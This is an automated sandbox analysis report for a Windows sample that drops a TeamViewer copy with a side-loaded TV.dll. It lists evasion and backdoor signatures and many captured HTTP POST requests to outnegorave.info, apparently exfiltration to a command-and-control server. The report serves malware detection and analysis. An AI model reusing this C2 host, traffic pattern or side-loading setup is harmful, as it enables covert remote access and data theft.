Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 77Etc0bR2v.bin

Overview

General Information

Sample Name:77Etc0bR2v.bin (renamed file extension from bin to exe)
Analysis ID:483795
MD5:e71e3b995477081569ed357e4d403666
SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags:exeHartexLLCsignedsoldewornek
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 77Etc0bR2v.exe (PID: 5292 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 2512 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1264 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5316 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3900 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3488 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1972 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2144 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1412 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6148 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6452 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6572 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6592 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%Perma Link
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86809Content-Type: multipart/form-data; boundary=--------4132168479User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88912Content-Type: multipart/form-data; boundary=--------142932537User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84988Content-Type: multipart/form-data; boundary=--------175819007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84980Content-Type: multipart/form-data; boundary=--------4273960975User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1234881971User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84926Content-Type: multipart/form-data; boundary=--------3962184161User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------1422274513User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85001Content-Type: multipart/form-data; boundary=--------1112577220User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85017Content-Type: multipart/form-data; boundary=--------3839284298User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85026Content-Type: multipart/form-data; boundary=--------3697122959User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85132Content-Type: multipart/form-data; boundary=--------847302753User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85014Content-Type: multipart/form-data; boundary=--------4150287082User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85006Content-Type: multipart/form-data; boundary=--------2687879271User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84930Content-Type: multipart/form-data; boundary=--------1383517322User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84992Content-Type: multipart/form-data; boundary=--------2011772679User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1980331567User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2185878550User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84985Content-Type: multipart/form-data; boundary=--------3572611147User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2639774921User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84974Content-Type: multipart/form-data; boundary=--------428629968User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84984Content-Type: multipart/form-data; boundary=--------1864185560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84991Content-Type: multipart/form-data; boundary=--------1379028263User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------2355185848User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1302388111User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1638634252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85242Content-Type: multipart/form-data; boundary=--------3575858873User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84965Content-Type: multipart/form-data; boundary=--------285568995User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88438Content-Type: multipart/form-data; boundary=--------2471988User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1216366252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85015Content-Type: multipart/form-data; boundary=--------3636690275User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84958Content-Type: multipart/form-data; boundary=--------1861026164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84979Content-Type: multipart/form-data; boundary=--------2060288736User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85018Content-Type: multipart/form-data; boundary=--------1941005641User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84997Content-Type: multipart/form-data; boundary=--------168896387User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------2074872272User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85003Content-Type: multipart/form-data; boundary=--------1323967378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84983Content-Type: multipart/form-data; boundary=--------29895310User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------4240026889User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
